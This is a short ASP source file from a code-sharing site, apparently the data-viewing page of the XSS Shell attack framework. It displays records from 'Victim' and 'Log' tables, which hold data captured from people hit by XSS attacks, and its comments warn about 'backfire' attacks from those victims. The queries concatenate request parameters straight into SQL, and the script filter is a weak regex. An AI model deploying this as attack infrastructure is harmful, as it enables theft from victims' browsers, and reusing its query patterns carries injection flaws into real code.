showdata.asp
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:2k
源码类别:

破解

开发平台:

ASP/ASPX

  1. <%
  2. '// SHOW DATA
  3. ' Show detailed data from records be carefull about backfire XSS attacks!
  4. '//HISTORY
  5. '09/08/2006
  6. ' - Started
  7. '//TODO
  8. ' - Safe HTML method (you can manually implement this page to a subpage for a more secure HTML viewing expreience)
  9. ' - Remove previously injected payload  (if any)
  10. %>
  11. <!--#include file="db.asp" -->
  12. <%
  13. protected()
  14. Dim mode
  15. mode = fm_Qnstr("m")
  16. Select Case mode
  17. Case 1
  18. ShowData
  19. Case Else
  20. ShowHTML
  21. End Select
  22. Sub ShowData()
  23. Dim RsData
  24. getRs RsData, "SELECT Data FROM Victim WHERE ID = " & fm_Qnstr("i")
  25. Response.Write "<blockquote>" & fm_Encode(RsData("Data")) & "</blockquote>"
  26. fmKill RsData
  27. End Sub
  28. Sub ShowHTML()
  29. Dim RsData
  30. getRs RsData, "SELECT ID, Data, Type, [Time] FROM Log  WHERE ID = " & fm_Qnstr("i")
  31. If RsData.EOF And RsData.BOF then Exit Sub
  32. Response.Write "Time : " & RsData("Time") & "<hr>"
  33. Dim Data2Write
  34. Data2Write = RsData("Data")
  35. fmKill RsData
  36. %>
  37. <script>
  38. window.onload=function(){
  39. var newdoc = filter(unescape("<%=Data2Write%>"));
  40. document.open();
  41. document.write(newdoc);
  42. document.close();
  43. }
  44. /*
  45.  You should;
  46. - implement your own filter here if it's not style otherwise xssshell will call itelf recursively
  47.  You can;
  48. - Build a filter for against backfire (XSS attacks from so called victim - don't forget this page and your patterns will be visible to everyone.)
  49. - or strip all HTML etc...
  50. */
  51. function filter(html){
  52. return html.replace(/<SCRIPTb[^>]*>(.*?)</SCRIPT>/i, "");
  53. }
  54. </script>
  55. <%
  56. End Sub
  57. %>